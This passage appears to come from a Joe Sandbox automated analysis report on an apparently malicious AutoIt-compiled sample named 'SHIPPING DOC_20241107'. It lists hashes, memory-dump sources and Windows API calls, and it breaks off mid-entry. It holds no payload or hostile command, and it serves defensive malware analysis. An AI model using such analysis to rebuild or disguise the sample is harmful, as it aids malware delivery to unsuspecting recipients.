                                                                                                                              • Opcode ID: 0a691898ac97b4aae44efa7dcfdd6582cea756f14f5b6eff02a37b8ff327ebbe
                                                                                                                              • Instruction ID: b48ed6b041096102de2ba9baeb640726dd33a7abd6afe3da322692db523bbd7a
                                                                                                                              • Opcode Fuzzy Hash: 0a691898ac97b4aae44efa7dcfdd6582cea756f14f5b6eff02a37b8ff327ebbe
                                                                                                                              • Instruction Fuzzy Hash: 791193719147119FC300DFB8DE45A4AFBE8EF84720F00891EF149932B2DBB09585CB96
                                                                                                                              APIs
                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009B5E27
                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 009EE0CC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 2ffcfe2c80f18e2194742259af54f107733f8fd6dd5d920d649175f4e9c6bf68
                                                                                                                              • Instruction ID: 4ab053b999c75a9bbe55cc1f2ebd66734b3d687508388aa8e201c0d8277c1919
                                                                                                                              • Opcode Fuzzy Hash: 2ffcfe2c80f18e2194742259af54f107733f8fd6dd5d920d649175f4e9c6bf68
                                                                                                                              • Instruction Fuzzy Hash: B901B170244708BEF7254E64DD8AFB67AACEB05778F108318FAE56A1E0C6F55E45CB10
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009D588C: __FF_MSGBANNER.LIBCMT ref: 009D58A3
                                                                                                                                • Part of subcall function 009D588C: __NMSG_WRITE.LIBCMT ref: 009D58AA
                                                                                                                                • Part of subcall function 009D588C: RtlAllocateHeap.NTDLL(00B30000,00000000,00000001,00000000,?,?,?,009D0F53,?), ref: 009D58CF
                                                                                                                              • std::exception::exception.LIBCMT ref: 009D0F6C
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 009D0F81
                                                                                                                                • Part of subcall function 009D871B: RaiseException.KERNEL32(?,?,?,00A69E78,00000000,?,?,?,?,009D0F86,?,00A69E78,?,00000001), ref: 009D8770
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3902256705-0
                                                                                                                              • Opcode ID: 2501b8c47108bc7b833a1b3e627a338c0ee8beebd6886ca719e5dded941e6cf8
                                                                                                                              • Instruction ID: 561063c6967f3883363a2baf19991c939eecc9b108d4c10f0cfa0b8656e6ec44
                                                                                                                              • Opcode Fuzzy Hash: 2501b8c47108bc7b833a1b3e627a338c0ee8beebd6886ca719e5dded941e6cf8
                                                                                                                              • Instruction Fuzzy Hash: 8CF0A4359C421966CB20AB98EC05BDF7BACAF80711F608467F908A6382EF71CA50C6D1
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009D8CA8: __getptd_noexit.LIBCMT ref: 009D8CA8
                                                                                                                              • __lock_file.LIBCMT ref: 009D555B
                                                                                                                                • Part of subcall function 009D6D8E: __lock.LIBCMT ref: 009D6DB1
                                                                                                                              • __fclose_nolock.LIBCMT ref: 009D5566
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2800547568-0
                                                                                                                              • Opcode ID: bc1a43db197777f64b0df278b6e09fd70318ad1ab5f69a6a62d0ccc0144b1236
                                                                                                                              • Instruction ID: 3b054e4823fb8b1f7fc8784a4974057713864e6c8f69e2213e843dee957c6fd5
                                                                                                                              • Opcode Fuzzy Hash: bc1a43db197777f64b0df278b6e09fd70318ad1ab5f69a6a62d0ccc0144b1236
                                                                                                                              • Instruction Fuzzy Hash: 8FF09071985A00AAD7216B79980676E67A26F80331F16C20BF424AB3C2CB7C49019B52
                                                                                                                              APIs
                                                                                                                              • InitializeCriticalSectionEx.KERNELBASE(00000000,00000000,009D9B8E,?,009D9E8B,00000000,00000FA0,00000000,00A6A1A8,00000008,009D9DA2,00000000,00000000,?,009D9BFC,0000000D), ref: 009D9FC4
                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000000,?,009D9E8B,00000000,00000FA0,00000000,00A6A1A8,00000008,009D9DA2,00000000,00000000,?,009D9BFC,0000000D), ref: 009D9FCE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalInitializeSection$CountSpin
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4156364057-0
                                                                                                                              • Opcode ID: eabee28e79a5bb1e7f5da260b557ff988cf8953377ae12f5b0d864684424a416
                                                                                                                              • Instruction ID: 4ba8493d0eda2928217fea9b670ffa870fe2e11d9aac3eaad683e57f324df4d3
                                                                                                                              • Opcode Fuzzy Hash: eabee28e79a5bb1e7f5da260b557ff988cf8953377ae12f5b0d864684424a416
                                                                                                                              • Instruction Fuzzy Hash: 7DD0673605414CFFCF02EFD4EC458993FAAFB48655B41C421F92C89130D772A962AB40
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 544645111-0
                                                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                              • Instruction ID: 6590519ce39c2bae7321ef8fcbc2d745aca200f3ecf71528909b5da431280202
                                                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                              • Instruction Fuzzy Hash: 1431B574A402059BC718DF59D484A69FBAAFF89300F68CAA6E409CB355DB31EDC1CB90
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClearVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1473721057-0
                                                                                                                              • Opcode ID: a671946422d1e7754e8bddb0055649d97129331adccc444a8e0545b8ec7b89b1
                                                                                                                              • Instruction ID: a06ded7edd8401703d8930afb67ab64b15240815c27bceee02df08b6f2672d38
                                                                                                                              • Opcode Fuzzy Hash: a671946422d1e7754e8bddb0055649d97129331adccc444a8e0545b8ec7b89b1
                                                                                                                              • Instruction Fuzzy Hash: 0D413774508341CFDB24CF18C484B5ABBE5BF85328F1988ACE9898B362C776EC45CB52
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4104443479-0
                                                                                                                              • Opcode ID: e8019e59f171612994a9998987a5ac3323902a76dd0ca6e3412a2c7e8786dcd4
                                                                                                                              • Instruction ID: d965af91654d89767423cb66ea72265d5351e7e5bda93d0a8bda3d0892e43f76
                                                                                                                              • Opcode Fuzzy Hash: e8019e59f171612994a9998987a5ac3323902a76dd0ca6e3412a2c7e8786dcd4
                                                                                                                              • Instruction Fuzzy Hash: D5214872604A09EBDF108FA6EC517AA7FB8FF94361F21896EE486C5191EB7098D0C744
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B4D13: FreeLibrary.KERNEL32(00000000,?), ref: 009B4D4D
                                                                                                                                • Part of subcall function 009D53CB: __wfsopen.LIBCMT ref: 009D53D6
                                                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00A752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009B4F6F
                                                                                                                                • Part of subcall function 009B4CC8: FreeLibrary.KERNEL32(00000000), ref: 009B4D02
                                                                                                                                • Part of subcall function 009B4DD0: _memmove.LIBCMT ref: 009B4E1A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1396898556-0
                                                                                                                              • Opcode ID: 90b188f710d3a5db625dde95da85d94f423f4cbefb2e0679b9f4bab161673734
                                                                                                                              • Instruction ID: b8a5ba5987f9d2cac1c6e4fb9f2ecee79f700b5d7248f5a717d5e9c9f2dd1ca0
                                                                                                                              • Opcode Fuzzy Hash: 90b188f710d3a5db625dde95da85d94f423f4cbefb2e0679b9f4bab161673734
                                                                                                                              • Instruction Fuzzy Hash: 0011E731640209BACF10BF70CE12FEE77A99F84720F108829F541A71C3DAB59A15AB90
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClearVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1473721057-0
                                                                                                                              • Opcode ID: 37e84b210725080099d45e539fd3d87b9cf2ae3a9754a31d3d03aa8e94ee6ee3
                                                                                                                              • Instruction ID: 191dcb2d47f915a510e2e4b3c1df8d340b48fde957741d211f347d64c210d215
                                                                                                                              • Opcode Fuzzy Hash: 37e84b210725080099d45e539fd3d87b9cf2ae3a9754a31d3d03aa8e94ee6ee3
                                                                                                                              • Instruction Fuzzy Hash: C72110B0908341DFDB24DF14C844B5ABBE5BF88324F05896CF99A5B762D731E809CB92
                                                                                                                              APIs
                                                                                                                              • FreeLibrary.KERNEL32(?,?,00A752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 009B4FDE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeLibrary
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3664257935-0
                                                                                                                              • Opcode ID: 06b2f6884f762291ab867d4699795c45f3971daa66b4437e5e8fd04b86a22c1f
                                                                                                                              • Instruction ID: c7070ea98044981b4e279c42e54db188509293eb2d720cefc805d6e7591dfbab
                                                                                                                              • Opcode Fuzzy Hash: 06b2f6884f762291ab867d4699795c45f3971daa66b4437e5e8fd04b86a22c1f
                                                                                                                              • Instruction Fuzzy Hash: B2F03971505712CFCB349F64E9948A2BBE5AF043393208A3EE1D683612C731A840EF40
                                                                                                                              APIs
                                                                                                                              • GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,009B741D,00000001,00A76290,?,009B3BCD,00A752F8,00A752E0,?,?), ref: 009D0930
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: LongNamePath_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2514874351-0
                                                                                                                              • Opcode ID: c3d2b0d747fcb45348403979a123e77411c0daa2b8ff30168793231946332097
                                                                                                                              • Instruction ID: 6e7c90caccf8897441d6c6b221d06a82707dd8dff3f47815c6a13886b6bc5913
                                                                                                                              • Opcode Fuzzy Hash: c3d2b0d747fcb45348403979a123e77411c0daa2b8ff30168793231946332097
                                                                                                                              • Instruction Fuzzy Hash: C1E086369051285BC721D6D89C05FFAB7EDDFC86A0F0401B5FC0CD7244D9605C818690
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00A1339D: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001), ref: 00A1341B
                                                                                                                              • WriteFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00A134B8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$PointerWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 539440098-0
                                                                                                                              • Opcode ID: e3b77703c5fe4f157adbec527dddc6cb194a5d305805827fedef9195ce147c3a
                                                                                                                              • Instruction ID: cc1beb50aded3f5ed73e7852b86c4dcf6b01a8d583a27cc0edb25817943de00e
                                                                                                                              • Opcode Fuzzy Hash: e3b77703c5fe4f157adbec527dddc6cb194a5d305805827fedef9195ce147c3a
                                                                                                                              • Instruction Fuzzy Hash: 99E04636410208FBDB20EF94DD05EDAB7BDEB04320F00065AFA4086110DBB2AE24ABA0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009D3397: __lock.LIBCMT ref: 009D3399
                                                                                                                              • __onexit_nolock.LIBCMT ref: 009D2DE0
                                                                                                                                • Part of subcall function 009D2E08: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,009D2DE5,009EB73A,00A69ED0), ref: 009D2E1B
                                                                                                                                • Part of subcall function 009D2E08: DecodePointer.KERNEL32(?,?,009D2DE5,009EB73A,00A69ED0), ref: 009D2E26
                                                                                                                                • Part of subcall function 009D2E08: __realloc_crt.LIBCMT ref: 009D2E67
                                                                                                                                • Part of subcall function 009D2E08: __realloc_crt.LIBCMT ref: 009D2E7B
                                                                                                                                • Part of subcall function 009D2E08: EncodePointer.KERNEL32(00000000,?,?,009D2DE5,009EB73A,00A69ED0), ref: 009D2E8D
                                                                                                                                • Part of subcall function 009D2E08: EncodePointer.KERNEL32(009EB73A,?,?,009D2DE5,009EB73A,00A69ED0), ref: 009D2E9B
                                                                                                                                • Part of subcall function 009D2E08: EncodePointer.KERNEL32(00000004,?,?,009D2DE5,009EB73A,00A69ED0), ref: 009D2EA7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3536590627-0
                                                                                                                              • Opcode ID: dcffc0c56f9a45b17df61eed3d5589a27dbba86c3e50853eb0dc574403052e6f
                                                                                                                              • Instruction ID: 69ee40b978808efee746b5f3a33426920de0fb95ec2d4773335531c3e67b4583
                                                                                                                              • Opcode Fuzzy Hash: dcffc0c56f9a45b17df61eed3d5589a27dbba86c3e50853eb0dc574403052e6f
                                                                                                                              • Instruction Fuzzy Hash: A1D01271D90219AADB10BBA4CA0675E76B46F90723F94C147F014A62C2CB7447028BA1
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __wfsopen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 197181222-0
                                                                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                              • Instruction ID: 9a6160a7269704cfb8724507f618a76d8937458b1c58fdf6ee4442d58195cded
                                                                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                              • Instruction Fuzzy Hash: 93B0927648020CB7CE012A82EC02B497B599B807A4F40C021FB0C182A2A6B3A6609689
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00A1D28B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1452528299-0
                                                                                                                              • Opcode ID: 67036c7e70c3c6d3e1b3d81858241e78bf3bfc4ca5afab02c1a046a037e6e9cf
                                                                                                                              • Instruction ID: 63569486b3f866c3920e9be9a75f12ae4c20c1f2848ef38be297d3edc4939ffe
                                                                                                                              • Opcode Fuzzy Hash: 67036c7e70c3c6d3e1b3d81858241e78bf3bfc4ca5afab02c1a046a037e6e9cf
                                                                                                                              • Instruction Fuzzy Hash: 6E7152352043018FC714EF68C691BEAB7E4AFC9324F44456DF9A69B2A2DB30ED45CB52
                                                                                                                              APIs
                                                                                                                              • CloseHandle.KERNELBASE(?), ref: 009B5DEF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2962429428-0
                                                                                                                              • Opcode ID: 9bbd21c049c3247b30d99c7c5392d2c475b6b98eaf3adfe5461bfb5c3d4c2816
